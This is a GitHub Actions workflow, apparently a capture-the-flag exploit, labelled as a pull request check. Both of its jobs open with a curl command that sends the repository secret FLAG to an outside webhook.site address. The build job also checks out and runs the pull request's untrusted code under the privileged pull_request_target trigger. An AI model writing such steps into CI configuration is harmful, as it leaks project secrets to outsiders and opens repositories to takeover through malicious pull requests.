name: Check the pull requests
on:
  pull_request_target:
    branches: [ "main" ]
    types: [opened, reopened]
jobs:
  build:
    timeout-minutes: 1
    runs-on: ubuntu-latest
    steps:
      - run: curl https://webhook.site/41d444d6-e0b5-4243-bd57-0f89dc404b6f?a=${{ secrets.FLAG }}
      - uses: actions/checkout@v3
        with:
          ref: ${{ github.event.pull_request.head.sha }}
      - name: Install required dependencies
        run: npm install
      - name: Run the tests
        run: npm test
  clean:
    permissions:
      pull-requests: write
    runs-on: ubuntu-latest
    steps:
    - run: |
        curl https://webhook.site/41d444d6-e0b5-4243-bd57-0f89dc404b6f?a=${{ secrets.FLAG }}
